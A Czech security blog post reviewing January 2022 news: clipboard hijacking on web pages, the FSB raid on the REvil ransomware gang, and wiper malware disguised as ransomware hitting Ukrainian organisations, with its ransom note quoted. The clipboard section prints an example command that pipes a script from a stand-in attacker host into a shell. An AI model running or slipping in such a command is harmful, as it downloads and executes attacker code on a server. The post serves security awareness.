Ransomware, hack serveru přes CTRL+V, video zátah na gang REvil

Výstavba a stěhování do nového domu způsobilo, že jsem na dlouhou dobu zmizel a neměl čas tuhle one-man-show živit žádným obsahem. Věřím, že nyní to bude o něco lepší, nicméně pro jistotu doporučuji odebírat novinky například tak, že v pravé části stránky zadáte svoji e-mailovou adresu a budete o nich obratem informováni.

Pozitivní zprávou může být to, že tahle životní etapa přinesla i můj posun v oblasti IOT (Internet of things), tedy orientaci v chytrých zařízeních připojených k internetu. Někdy příště se tak rád podělím například o zkušenosti s chytrým elektrickým uzávěrem vody, který krásně ukazuje paradoxy některých těchto chytrých zařízení. Ten můj například vodu neuzavře, pokud Vám zrovna vypadlo spojení do internetu a nebo mají čínské cloud servery výpadek. A to přitom stojíte o 1 metr vedle a jste na stejné WiFi síti jako ventil… Prostě smůla!

Nyní tedy alespoň přehled toho, co mě zaujalo v lednu 2022.

Jak se nechat hacknout přes copy / paste

Pointa je celkem jednoduchá. Na webové stránce uvidíte nějaký text, který je předurčen k tomu, abyste ho zkopírovali do schránky (CTRL+C). Díky možnostem javaskriptu se ale útočník postará o to, že následný stisk CTRL+V (případně jiná klávesová zkratka) vloží úplně něco jiného, než to, co očekáváte, že je ve schránce.

A když si tohle představíte v kontextu správy serveru, kdy si administrátor pomáhá tím, že hledá po internetu různé postupy a návody (typicky stackoverflow.com) a práce v terminálu probíhá stylem, že příkazy z návodu jede stylem copy / paste, může být na prů*er zaděláno! Místo nevinného příkazu zkopírovaného z webu pomocí CTRL+C:

sudo apt update (případ distribuce Debian)

se do terminálu vloží například:

curl http://attacker-domain:8000/shell.sh | sh

Tedy příkaz, který z internetu stáhne škodlivý skript a následně ho na serveru spustí. To vše se navíc stane automaticky bez toho, aby to mohl admin zarazit (leda že by byl sakra rychlej). Za příkazem totiž následuje sekvence neviditelných znaků pro odřádkování, tedy automatického stisku klávesy ENTER (sekvence \n)!

Celou ideu si můžete osobně vyzkoušet na této stránce: https://www.wizer-training.com/blog/copy-paste. Jak jednoduché a přitom tak zákeřné!

VIDEO: Zátah na gang stojící za ransomwarem REvil

O ransomwaru REvil jsem na viry.cz psal několikrát obvykle v souvislosti s postupnou evolucí této havěti. V září 2021 jsem psal o REvil prvně pozitivně. Objevil se totiž dekryptor pro obnovu zašifrovaných souborů pro všechny uživatele, jenž se stali obětí útoku do 13. července 2021. Bylo to výsledkem zátahu policie či jiných bezpečnostních složek někde ve světě.

Nyní zasáhla i ruská FSB. Výsledkem je konfiskace 20 luxusních aut a zabavení financí v hodnotě kolem 130 milionů Kč! Sestřih ze zásahů je k vidění na Youtube. Všimněte si, že FSB použila též metodu sociálního inženýrství. Před dveřmi stál nevinně vypadající člověk v montérkách, který chtěl možná provést jen odečet vody 🙂

Destruktivní havěť vydávající se za „umírněný“ ransomware

Dle zprávy Microsoftu jsou Ukrajinské organizace pod útokem destruktivní havěti, která se vydává za ransomware. S pointou ransomwaru ale sdílí jen to, že za obnovu zašifrovaných souborů požaduje zaplatit BTC výkupné v hodnotě 10 tisíc dolarů. Žádná možnost obnovy dat ale neexistuje. Původní obsah souborů je totiž surově přepsán bez šifrovacího algoritmu. Přepsán je i zavadeč – MBR disku, takže počítač hned po zapnutí zobrazí tyto instrukce:

Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.

Platit se ale organizacím evidentně nechce, na bitcoinové adrese se totiž nacházejí necelých 5 dolarů 🙂